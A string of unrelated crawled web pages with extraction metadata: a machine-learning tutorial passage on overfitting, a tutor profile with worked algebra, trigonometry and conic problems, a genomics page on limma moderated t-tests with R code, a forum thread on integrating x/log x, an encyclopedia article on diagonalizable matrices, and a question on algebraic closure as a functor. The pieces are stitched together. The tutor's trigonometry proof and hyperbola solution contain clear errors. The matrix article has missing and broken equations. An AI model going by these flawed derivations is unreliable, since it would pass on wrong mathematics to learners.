see if we can improve the current Model. First, we have to modify our $$X$$ matrix by adding $$X^2$$: Similar to previous step, let’s train our new Model, then compute the prediction vector $$a$$: Mathematically, we will now have $$a=\theta_0 + \theta_1X + \theta_2X^2$$. Note that now we have more complicated matrix X, so we will have to use the dot function. An error will occur if we just use the multiply operator like above. I also created a new $$x$$ variable, which ranges from 1 to 10, but with 0.1 step. Use the new $$x$$ to compute $$a$$ will result in a smoother graph of $$a$$, since $$a$$ is no longer a straight line anymore. Now let’s plot things out and see what we got with new feature matrix: As you can see, now we obtain a curved line, which seems to fit our training data much better. To be more concrete, let’s use the score function: You see that? Now we got a new accuracy of 87%, which is a huge improvement right? At this point, you may think that we can improve it a lot more by continuing to add more polynomial features to it. Well, don’t guess. Let’s just do it. This time we will add up to degree 9. Now we just obtained a new curve which fit our training data perfectly. Let’s use the score function again to get an exact number: Wow, let’s see what we have here, an accuracy of 100%. This is real magic, you may think. But that is just where the tragic begins… ### OVERFITTING & UNDERFITTING Now let imagine our data has total 15 examples, and I just showed you the first 10. I will reveal the last 5 examples like below: X y 11 24 12 23 13 22 14 26 15 22 So actually our data will look like this: Let’s see what happens if we use the Model obtained from degree 9 polynomial features: Do you see what I am seeing? What a tragic! It doesn’t seem to fit the new data at all! We don’t even feel the need of computing the accuracy on the new data! So what the hell this is all about? As I told you before, in the first post, that we only provided a fixed set of training data, and the Model will have to deal with new data which it has never seen before. New data, which may vary in unpredictable way in real life, penalized our trained Model this time! In Machine Learning term, we call it OVERFITTING problem (or High Variance). Overfitting, as the name is self-explained itself, means that the Model fits the data very well when we prodived a set of data containing a lot of features. We can see that the Model tends to memorize the data, rather than to learn from it, which makes it unable to predict the new data. In contrast, what will happen if we use just one feature like we did in the beginning (or we can say that we provided a set of data which is poorly informative)? You have already seen that it resulted in a very low accuracy, which is not what we expected, either. We call this problem UNDERFITTING (or High Bias). Overfitting & Underfitting, in both cases, are something that we try to avoid. And you will mostly face these problems all the time you work with Machine Learning. Of course, there are many ways to deal with them, but I will leave all the details for a future post. This time I will tell you the simplest way, which can be seen as a “must-do” in the very first step of any Machine Learning problem. ### Splitting dataset for training and testing The first thing to do to prevent the problems above, is always splitting the dataset into training data and testing data. Never just count on the accuracy on training data! Why? Because even though we obtained a high accuracy, it does not mean that our Model is doing a good job. Conversely, we need to watch out for Overfitting problem. By splitting our dataset into two seperate parts, we will use one part for training, and the other for evaluating the trained Model. Because we evaluate the performance on a separate data, we can know if our Model can work well with new data that it has never seen. And we can somehow tell whether our Model has Overfitting problem or not. Underfitting, on the other hand, can easily be discovered just by looking at the accuracy over the training data, because if our Model has Underfitting problem, then it will perform poorly on both dataset. Finally, we will pick the Model which has the highest accuracy on the testing data. With the approach I have shown you, let’s decide which Model to choose among three models above. We will use first ten examples as training data, and the last five examples for testing. #### Model 3 As you can see, both by visualizing and by looking at the accuracy. Our first model is too simple, which didn’t fit our data well. This is an example of Underfitting problem. In contrast, our third model is way too complicated, which performed very well on training data, but failed to fit the testing data. This is what we called Overfitting problem. The second model may not fit as well as the third model, but it is the one that actually learned, which results in good performance over the testing data. And we can somehow say that, it will also predict well with any other data which it has never seen during training. ### Conclusion So today, through implementing Linear Regression, I led you through the most common problems you may face when working with Machine Learning, which are Underfitting and Overfitting. I also showed you the easiest way to avoid those problems, which is always splitting the dataset into two parts: one for training purpose, and one for testing. Hope you find today’s post helpful and you now put a further step into Machine Learning world, I think. There is no stopping as you has gone this far. In the next post, I will continue with Logistic Regression, which is an extremely important algorithm that you must understand, because it is the key which leads you to the most powerful learning technique nowadays: Neural Network. So stay updated, and I will be with you soon. See you! Tags: Categories: Updated:
2019-01-17 03:51:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5545291304588318, "perplexity": 442.8214719498046}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583658681.7/warc/CC-MAIN-20190117020806-20190117042806-00581.warc.gz"}
https://tutorme.com/tutors/204609/interview/
Enable contrast version # Tutor profile: Joseph B. Inactive Joseph B. Math and Science tutor for 2 years Tutor Satisfaction Guarantee ## Questions ### Subject:Linear Algebra TutorMe Question: Find the solutions for the given system $$x+2y=1$$ $$3x+2y+4z=7$$ $$-2x+y-2z = -1$$ Inactive Joseph B. We can solve this using a mixture of Gaussian elimination and substitution First we will multiply row 1 by -3 and add it to row 2 $$-3[x+2y] +[3x +2y+4z] = -3(1) + 7$$ Then multiply row 1 by 2 and add it to row 3 $$2[x+2y] + [-2x +y - 2z] = 2(1) + (-1)$$ Which gives us a new system: $$x+2y = 1$$ $$-4y +4z =4$$ $$5y -2z = 1$$ We can divide row 2 by 4 $$x+2y = 1$$ $$-y +z =1$$ $$5y -2z = 1$$ We will repeat the above process using row 2, multiplying it by 2 and 5, then adding to row 1 and row 3 respectively. After doing so our new system should look like this: $$x = -1$$ $$-y +z =1$$ $$3z = 6$$ Solving row 3 gives us $$z = 2$$, we can see that $$x=-1$$, and substituting $$z=2$$ into row 2 and solving tells us that $$y=1$$ ### Subject:Trigonometry TutorMe Question: Using double angle identities, prove that $$1-\sin^{2}{x} = \cos^{2}{x}$$ Inactive Joseph B. We will start with the left side of the equation, and work it through to equivalency. First we will use a double angle identity $$\cos(2x) = \cos^{2}(x)-\sin^{2}(x)$$ then replace the $$\sin^{2}(x)$$ $$1-[\cos^{2}(x)-\cos(x)]$$ Then using another double angle identity $$\cos(2x) = 2\cos^{2}(x) - 1$$ we make another substitution $$1 -[\cos^{2}(x) - (2\cos^{2}(x) - 1)]$$ Redistribute and combine like terms $$1-[\cos^{2}(x) -2\cos^{2}(x) +1]$$ $$1-[-\cos^{2}(x) +1]$$ $$\cos^{2}(x)$$ Thus $$1 -\sin^{2}(x) = \cos^{2}(x)$$ ### Subject:Calculus TutorMe Question: Find the foci, vertices, center, eccentricity, and asymptotes of the conic section: $$9x^{2} - 16y^{2} -36x -32y - 92 = 0$$ (This is a calculus III problem) Inactive Joseph B. First we will want to rearrange the function in the form of: $$\frac{(x-h)^{2}}{a^{2}} + \frac{(y-k)^{2}}{b^{2}} = 1$$ To do so we reorganize the function as so: $$9x^{2} - 36x -16y^{2} - 32y = 92$$ From here we factor, then complete the square: $$9(x^{2} - 4x) -16 (y^{2} -2y) = 92$$ $$\frac{(x-2)^{2}}{9} + \frac{(y+1)^{2}}{16} = 1$$ Looking at this equation we can see that the center is at (h,k) = (2, -1) We also know that the verticies are $$a$$ distance away, symmetric about the center = (-1,-1), (5, -1) Similarly the foci are $$b$$ distance away, symmetric about the center = (-3,-1), (7,-1) Eccentricity is found using the formula $$\frac{\sqrt{a^{2}+b^{2}} }{a}$$ = $$\frac{5}{3}$$ Lastly, using $$c^{2} = a^{2} + b^{2}$$ we find that the equations of the asymptotes to be $$y = \frac{4x}{3}-\frac{11}{2}$$ and $$y = \frac{5}{3} - \frac{4x}{3}$$ ## Contact tutor Send a message explaining your needs and Joseph will reply soon. Contact Joseph
2020-07-02 11:49:24
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8615203499794006, "perplexity": 355.0669335005647}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655878753.12/warc/CC-MAIN-20200702111512-20200702141512-00072.warc.gz"}
http://genomicsclass.github.io/book/pages/hierarchical_models.html
## Hierarchical Models In this section, we use the mathematical theory which describes an approach that has become widely applied in the analysis of high-throughput data. The general idea is to build a hierachichal model with two levels. One level describes variability across samples/units, and the other describes variability across features. This is similar to the baseball example in which the first level described variability across players and the second described the randomness for the success of one player. The first level of variation is accounted for by all the models and approaches we have described here, for example the model that leads to the t-test. The second level provides power by permitting us to “borrow” information from all features to inform the inference performed on each one. Here we describe one specific case that is currently the most widely used approach to inference with gene expression data. It is the model implemented by the limma Bioconductor package. This idea has been adapted to develop methods for other data types such as RNAseq by, for example, edgeR and DESeq2. This package provides an alternative to the t-test that greatly improves power by modeling the variance. While in the baseball example we modeled averages, here we model variances. Modelling variances requires more advanced math, but the concepts are practically the same. We motivate and demonstrate the approach with an example. Here is a volcano showing effect sizes and p-value from applying a t-test to data from an experiment running six replicated samples with 16 genes artificially made to be different in two groups of three samples each. These 16 genes are the only genes for which the alternative hypothesis is true. In the plot they are shown in blue. library(SpikeInSubset) ##Available from Bioconductor data(rma95) library(genefilter) fac <- factor(rep(1:2,each=3)) tt <- rowttests(exprs(rma95),fac) smallp <- with(tt, p.value < .01) spike <- rownames(rma95) %in% colnames(pData(rma95)) cols <- ifelse(spike,"dodgerblue",ifelse(smallp,"red","black")) with(tt, plot(-dm, -log10(p.value), cex=.8, pch=16, xlim=c(-1,1), ylim=c(0,4.5), xlab="difference in means", col=cols)) abline(h=2,v=c(-.2,.2), lty=2) We cut-off the range of the y-axis at 4.5, but there is one blue point with a p-value smaller than $10^{-6}$. Two findings stand out from this plot. The first is that only one of the positives would be found to be significant with a standard 5% FDR cutoff: sum( p.adjust(tt$p.value,method = "BH")[spike] < 0.05) ## [1] 1 This of course has to do with the low power associated with a sample size of three in each group. The second finding is that if we forget about inference and simply rank the genes based on the size of the t-statistic, we obtain many false positives in any rank list of size larger than 1. For example, six of the top 10 genes ranked by t-statistic are false positives. table( top50=rank(tt$p.value)<= 10, spike) #t-stat and p-val rank is the same ## spike ## top50 FALSE TRUE ## FALSE 12604 12 ## TRUE 6 4 In the plot we notice that these are mostly genes for which the effect size is relatively small, implying that the estimated standard error is small. We can confirm this with a plot: tt$s <- apply(exprs(rma95), 1, function(row) sqrt(.5 * (var(row[1:3]) + var(row[4:6]) ) ) ) with(tt, plot(s, -log10(p.value), cex=.8, pch=16, log="x",xlab="estimate of standard deviation", col=cols)) Here is where a hierarchical model can be useful. If we can make an assumption about the distribution of these variances across genes, then we can improve estimates by “adjusting” estimates that are “too small” according to this distribution. In a previous section we described how the F-distribution approximates the distribution of the observed variances. Because we have thousands of data points, we can actually check this assumption and also estimate the parameters $s_0$ and $d_0$. This particular approach is referred to as empirical Bayes because it can be described as using data (empirical) to build the prior distribution (Bayesian approach). Now we apply what we learned with the baseball example to the standard error estimates. As before we have an observed value for each gene $s_g$, a sampling distribution as a prior distribution. We can therefore compute a posterior distribution for the variance $\sigma^2_g$ and obtain the posterior mean. You can see the details of the derivation in this paper. As in the baseball example, the posterior mean shrinks the observed variance $s_g^2$ towards the global variance $s_0^2$ and the weights depend on the sample size through the degrees of freedom $d$ and, in this case, the shape of the prior distribution through $d_0$. In the plot above we can see how the variance estimate shrink for 40 genes (code not shown): An important aspect of this adjustment is that genes having a sample standard deviation close to 0 are no longer close to 0 (the shrink towards $s_0$ ). We can now create a version of the t-test that instead of the sample standard deviation uses this posterior mean or “shrunken” estimate of the variance. We refer to these as moderated t-tests. Once we do this, the improvements can be seen clearly in the volcano plot: library(limma) fit <- lmFit(rma95, model.matrix(~ fac)) ebfit <- ebayes(fit) limmares <- data.frame(dm=coef(fit)[,"fac2"], p.value=ebfit$p.value[,"fac2"]) with(limmares, plot(dm, -log10(p.value),cex=.8, pch=16, col=cols,xlab="difference in means", xlim=c(-1,1), ylim=c(0,5))) abline(h=2,v=c(-.2,.2), lty=2) The number of false positives in the top 10 is now reduced to 2. table( top50=rank(limmares\$p.value)<= 10, spike) ## spike ## top50 FALSE TRUE ## FALSE 12608 8 ## TRUE 2 8
2017-11-25 00:08:11
{"extraction_info": {"found_math": true, "script_math_tex": 10, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5186021327972412, "perplexity": 1574.0398049650494}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934809160.77/warc/CC-MAIN-20171124234011-20171125014011-00346.warc.gz"}
https://www.physicsforums.com/threads/integrating-a-curious-function.548098/
# Homework Help: Integrating a curious function 1. Nov 7, 2011 ### zip37 1. The problem statement, all variables and given/known data I'm having some trouble trying to integrate the following function 2. Relevant equations $\int([x/(logx)]dx)$ 3. The attempt at a solution I have tried integration by parts but I get stuck with harder integrals. What I'd like to know is that this function could be integrated or not. :) I've tried using Wolfram Alpha for this particular case but my math level is way below the explanations given there. 2. Nov 7, 2011 ### Ray Vickson Do you mean that the integrand is $f(x) = x/ \log(x)$ or do you mean $f(x) = [x/ \log(x)]$, where $[\cdots]$ is the "greatest-integer function"? If you mean the former, Maple expresses the result in terms of the non-elementary function Ei (the exponential integral): $$\mbox{Ei}(y) = P\int_{-\infty}^y \frac{e^t}{t} dt,$$ with P denoting the principal value integral. RGV 3. Nov 7, 2011 ### zip37 Yes, I meant the former, the integrand is x/logx. Thank you for the information! I'm looking up a bit in other websites what this Ei function is in more detail. 4. Nov 7, 2011 ### Matterwave Are you integrating that through the whole real line? In that case you really do have a principal value integral because you are moving through a pole in the integrand. 5. Nov 8, 2011 ### kmacinto Integration by parts is the way I would go. Try both functions for u. Ya got a 50% chance that your 1st choice is the correct one :) 6. Nov 8, 2011 ### Ray Vickson Integration by parts in NOT the way to go. Your second comment makes no sense: the OP is 100% sure of what he/she means. Anyway, the second form f(x)= [x/log(x)] (where [] = greatest-integer function) will not have an analytically expressible integral---think about why not. RGV
2018-10-18 04:41:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.866117537021637, "perplexity": 1033.2197012551067}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583511703.70/warc/CC-MAIN-20181018042951-20181018064451-00519.warc.gz"}
https://stoneswww.academickids.com/encyclopedia/index.php/Diagonalizable_matrix
# Diagonalizable matrix In linear algebra, a square matrix A is called diagonalizable if it is similar to a diagonal matrix, i.e. if there exists an invertible matrix P such that P -1AP is a diagonal matrix. If V is a finite-dimensional vector space, then a linear map T : VV is called diagonalizable if there exists a basis of V with respect to which T is represented by a diagonal matrix. Diagonalization is the process of finding a corresponding diagonal matrix for a diagonalizable matrix or linear map. Diagonalizable matrices and maps are of interest because diagonal matrices are especially easy to handle: their eigenvalues and eigenvectors are known and one can raise a diagonal matrix to a power by simply raising the diagonal entries to that same power. The fundamental fact about diagonalizable maps and matrices is expressed by the following: • An n-by-n matrix A over the field F is diagonalizable if and only if the sum of the dimensions of its eigenspaces is equal to n, which is the case if and only if there exists a basis of Fn consisting of eigenvectors of A. If such a basis has been found, one can form the matrix P having these basis vectors as columns, and P -1AP will be a diagonal matrix. The diagonal entries of this matrix are the eigenvalues of A. • A linear map T : VV is diagonalizable if and only if the sum of the dimensions of its eigenspaces is equal to dim(V), which is the case if and only if there exists a basis of V consisting of eigenvectors of T. With respect to such a basis, T will be represented by a diagonal matrix. The diagonal entries of this matrix are the eigenvalues of T. Another characterization: A matrix or linear map is diagonalizable over the field F if and only if its minimal polynomial is a product of distinct linear factors over F. The following sufficient (but not necessary) condition is often useful. • An n-by-n matrix A is diagonalizable over the field F if it has n distinct eigenvalues in F, i.e. if its characteristic polynomial has n distinct roots in F. • A linear map T : VV with n=dim(V) is diagonalizable if it has n distinct eigenvalues, i.e. if its characteristic polynomial has n distinct roots in F. As a rule of thumb, over C almost every matrix is diagonalizable. More precisely: the set of complex n-by-n matrices that are not diagonalizable over C, considered as a subset of Cn×n, is a null set with respect to the Lebesgue measure. One can also say that the diagonalizable matrices form a dense subset with respect to the Zariski topology: the complement lies inside the set where the discriminant of the characteristic polynomial vanishes, which is a hypersurface. From that follows also density in the usual (strong) topology given by a norm. The same is not true over R. As n increases, it becomes (in some sense) less and less likely that a randomly selected real matrix is diagonalizable over R. Contents ## Examples ### How to diagonalize a matrix Consider a matrix [itex]A=\begin{bmatrix} 1 & 2 & 0 \\ 0 & 3 & 0 \\ 2 & -4 & 2 \end{bmatrix}[itex] This matrix has eigenvalues [itex] \lambda_1 = 3, \quad \lambda_2 = 2, \quad \lambda_3= 1. [itex] So A is a 3-by-3 matrix with 3 different eigenvalue, therefore it is diagonalizable. If we want to diagonalize A, we need to compute the corresponding eigenvectors. They are [itex] v_1 = \begin{bmatrix} -1 \\ -1 \\ 2 \end{bmatrix}, \quad v_2 = \begin{bmatrix} 0 \\ 0 \\ 1 \end{bmatrix}, \quad v_3 = \begin{bmatrix} -1 \\ 0 \\ 2 \end{bmatrix}. [itex] One can easily check that [itex]A v_k = \lambda_k v_k[itex]. Now, let P be the matrix with these eigenvectors as its columns: [itex]P= \begin{bmatrix} -1 & 0 & -1 \\ -1 & 0 & 0 \\ 2 & 1 & 2 \end{bmatrix}.[itex] Then P diagonalizes A, as a simple computation confirms: [itex]P^{-1}AP = \begin{bmatrix} -1 & 0 & -1 \\ -1 & 0 & 0 \\ 2 & 1 & 2 \end{bmatrix}^{-1} \begin{bmatrix} 1 & 2 & 0 \\ 0 & 3 & 0 \\ 2 & -4 & 2 \end{bmatrix} \begin{bmatrix} -1 & 0 & -1 \\ -1 & 0 & 0 \\ 2 & 1 & 2 \end{bmatrix} = \begin{bmatrix} 3 & 0 & 0 \\ 0 & 2 & 0 \\ 0 & 0 & 1\end{bmatrix}.[itex] Note that the eigenvalues [itex]\lambda_k[itex] appear in the diagonal matrix. ### Matrices that are not diagonalizable Some real matrices are not diagonalizable over the reals. Consider for instance the matrix [itex] B = \begin{bmatrix} 0 & 1 \\ -1 & 0 \end{bmatrix}. [itex] The matrix B does not have any real eigenvalues, so there is no real matrix Q such that [itex]Q^{-1}BQ[itex] is a diagonal matrix. However, we can diagonalize B if we allow complex numbers. Indeed, if we take [itex] Q = \begin{bmatrix} 1 & \textrm{i} \\ \textrm{i} & 1 \end{bmatrix}, [itex] then [itex]Q^{-1}BQ[itex] is diagonal. However, there are also matrices that are not diagonalizable, even if complex numbers are used. This happens if the geometric and algebraic multiplicities of an eigenvalues do not coincide. For instance, consider [itex] C = \begin{bmatrix} 0 & 1 \\ 0 & 0 \end{bmatrix}. [itex] This matrix is not diagonalizable: there is no matrix U such that [itex]U^{-1}CU[itex] is a diagonal matrix. Indeed, C has one eigenvalue (namely zero) and this eigenvalue has algebraic multiplicity 2 and geometric multiplicity 1. ## An application Diagonalization can be used to compute the powers of a matrix A efficiently, provided the matrix is diagonalizable. Suppose we have found that [itex]P^{-1}AP = D[itex] is a diagonal matrix. Then [itex]A^k = (PDP^{-1})^k = PD^kP^{-1}[itex] and the latter is easy to calculate since it only involves the powers of a diagonal matrix. For example, consider the following matrix: [itex]M =\begin{bmatrix}a & b-a \\ 0 &b \end{bmatrix}.[itex] Calculating the various powers of M reveals a surprising pattern: [itex] M^2 = \begin{bmatrix}a^2 & b^2-a^2 \\ 0 &b^2 \end{bmatrix},\quad M^3 = \begin{bmatrix}a^3 & b^3-a^3 \\ 0 &b^3 \end{bmatrix},\quad M^4 = \begin{bmatrix}a^4 & b^4-a^4 \\ 0 &b^4 \end{bmatrix},\quad \ldots [itex] The above phenomenon can be explained by diagonalizing M. To accomplish this, we need a basis of R2 consisting of eigenvectors of M. One such eigenvector basis is given by \mathbf{v}=\begin{bmatrix} 1 \\ 1 \end{bmatrix}=\mathbf{e}_1+\mathbf{e}_2,[itex] where ei denotes the standard basis of Rn. The reverse change of basis is given by [itex] \mathbf{e}_1 = \mathbf{u},\qquad \mathbf{e}_2 = \mathbf{v}-\mathbf{u}.[itex] Straighforward calculations show that Thus, a and b are the eigenvalues corresponding to u and v, respectively. By linearity of matrix multiplication, we have that [itex] M^n \mathbf{u} = a^n\, \mathbf{u},\qquad M^n \mathbf{v}=b^n\,\mathbf{v}.[itex] Switching back to the standard basis, we have [itex] M^n \mathbf{e}_1 = M^n \mathbf{u} = a^n \mathbf{e}_1,[itex] [itex] M^n \mathbf{e}_2 = M^n (\mathbf{v}-\mathbf{u}) = b^n \mathbf{v} - a^n\mathbf{a} = (b^n-a^n) \mathbf{e}_1+b^n\mathbf{e}_2.[itex] The preceding relations, expressed in matrix form, are [itex] M^n = \begin{bmatrix}a^n & b^n-a^n \\ 0 &b^n \end{bmatrix}, [itex] thereby explaining the above phenomenon. ## References • Art and Cultures • Countries of the World (http://www.academickids.com/encyclopedia/index.php/Countries) • Space and Astronomy
2021-09-19 04:09:17
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9998367428779602, "perplexity": 227.81121883975874}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780056711.62/warc/CC-MAIN-20210919035453-20210919065453-00337.warc.gz"}
https://math.stackexchange.com/questions/3300131/can-taking-algebraic-closure-be-made-into-a-functor
# Can “Taking algebraic closure” be made into a functor? I am now confused with such problem as title goes. To be exact, the problem is Does there exist a functor from $$A:\mathsf{Field}\to \mathsf{Field}$$ with a natural transformation from identity functor $$\iota: \operatorname{id}\to A$$ such that for each $$F$$, $$A(F)$$ is the algebraically closure of $$F$$ through $$\iota_F:F\to A(F)$$? It is not easy rather than first glimpse. Let me explain. Note that, the existence of algebraic closure only ensures that there exist a map from $$\operatorname{Obj}(\mathsf{Field})$$ to itself. Since the "extension" property is not unique, it is not generally true that we can extend the map to $$\operatorname{Mor}(\mathsf{Field})$$ for arbitrary choice of algebraic closure. 1. For example, consider the fields $$\begin{array}{ccc} \mathbb{Q}[\sqrt[3]{2}, \sqrt{2}] &\to & \mathbb{Q}[\omega\sqrt[3]{2}, \sqrt{2}]\\ \uparrow &&\uparrow \\ \mathbb{Q}[\sqrt[3]{2}] & \to & \mathbb{Q}[\omega\sqrt[3]{2}] \end{array}$$ If we choose the algebraically closure of $$\left[\begin{matrix}\mathbb{Q}[\sqrt[3]{2}, \sqrt{2}] & \mathbb{Q}[\omega\sqrt[3]{2}, \sqrt{2}]\\ & \mathbb{Q}[\omega\sqrt[3]{2}]\end{matrix}\right]$$ by inclusion to $$\overline{\mathbb{Q}}$$, and the closure of $$\mathbb{Q}[\sqrt[3]{2}]\to \overline{\mathbb{Q}}$$ by $$\sqrt[3]{2}\mapsto \omega\sqrt[3]{2}$$. We cannot extend a well-defined functor. Similar problem exists for transcendental extension, for example, square like this $$\begin{array}{ccc} \mathbb{C}[X,Y] &\to & \mathbb{C}[X^2,Y]\\ \uparrow &&\uparrow \\ \mathbb{C}[X] & \to & \mathbb{C}[X^2] \end{array}$$ A reasonable method is to avoid phenomenon above is as follow. Fix an algebraically closed field $$F$$, and take all of its subfields as "skeleton", then fix an isomorphism to a subfields of $$F$$ from all fields whose algebraic closure is $$F$$ up to an isomorphism. The isomorphic class of algebraically closure are completely dependen by its characteristic and the transcendental dimension over prime field $$\mathbb{Q}$$ or $$\mathbb{F}_p$$. 2. Now the problem is how to naturally chose extensions for endmorphisms. But unfortunately, the choice is fragile. For instance, consider the following diagram $$\begin{array}{ccccl} \mathbb{Q}[\sqrt{3}, \sqrt{2}] &\to & \mathbb{Q}[\sqrt{3}, \sqrt{2}] &: &\sqrt{3}\mapsto -\sqrt{3},\sqrt{2}\mapsto \pm \sqrt{2}\\ \uparrow &&\uparrow \\ \mathbb{Q}[\sqrt{3}] & \to & \mathbb{Q}[\sqrt{3}] &:&\sqrt{3}\mapsto -\sqrt{3} \end{array}$$ There is no suitable choice such that $$\begin{array}{ccccl} \overline{\mathbb{Q}} &\to & \overline{\mathbb{Q}} &: &\sqrt{3}\mapsto -\sqrt{3},\sqrt{2}\mapsto \pm \sqrt{2}\\ \parallel &&\parallel \\ \overline{\mathbb{Q}}& \to & \overline{\mathbb{Q}} &:&\sqrt{3}\mapsto -\sqrt{3} \end{array}$$ commutes for both $$\pm=+$$ and $$\pm=-$$. • I am sure that this came up somewhere recently. Either here or on MathOverflow. Maybe not in this exact formulation, but the essence was the same. – Asaf Karagila Jul 23 at 8:44 • A simple example of why this is not possible is also given in (ncatlab.org/nlab/show/algebraically+closed+field). One considers the equalizer diagram $\mathbb{R} \to \mathbb{C} \xrightarrow[\text{conj}]{\text{id}} \mathbb{C}$ and sees that it would not to extend to a commutative diagram under such a functor. – Parthiv Basu Jul 24 at 0:47 No, this is not possible. For instance, let $$K$$ be any field with a automorphism $$f:K\to K$$ whose order is finite and greater than $$2$$. Then $$A(f):A(K)\to A(K)$$ would be an automorphism of the same order extending $$f$$. But no such automorphism exists: by the Artin-Schreier theorem, any finite-order automorphism of an algebraically closed field has order at most $$2$$. Or without using any big theorems, you can find problems just looking at finite extensions. For instance, if $$f$$ is the Frobenius automorphism of $$\mathbb{F}_{p^2}$$ then $$F(f)$$ is an extension to an algebraic closure which still has order $$2$$. Since $$\mathbb{F}_{p^4}$$ is normal over $$\mathbb{F}_{p}$$, $$F(f)$$ restricts to an automorphism of $$\mathbb{F}_{p^4}$$, which must be the Frobenius squared in order to have order $$2$$. But the Frobenius squared does not restrict to $$f$$ on $$\mathbb{F}_{p^2}$$, so this is a contradiction.
2019-08-18 16:59:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 40, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9667516946792603, "perplexity": 188.88423606183258}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027313987.32/warc/CC-MAIN-20190818165510-20190818191510-00024.warc.gz"}
https://www.nature.com/articles/s42004-019-0136-1?error=cookies_not_supported&code=f9fc15e7-1fe5-426a-896f-c956514536fb
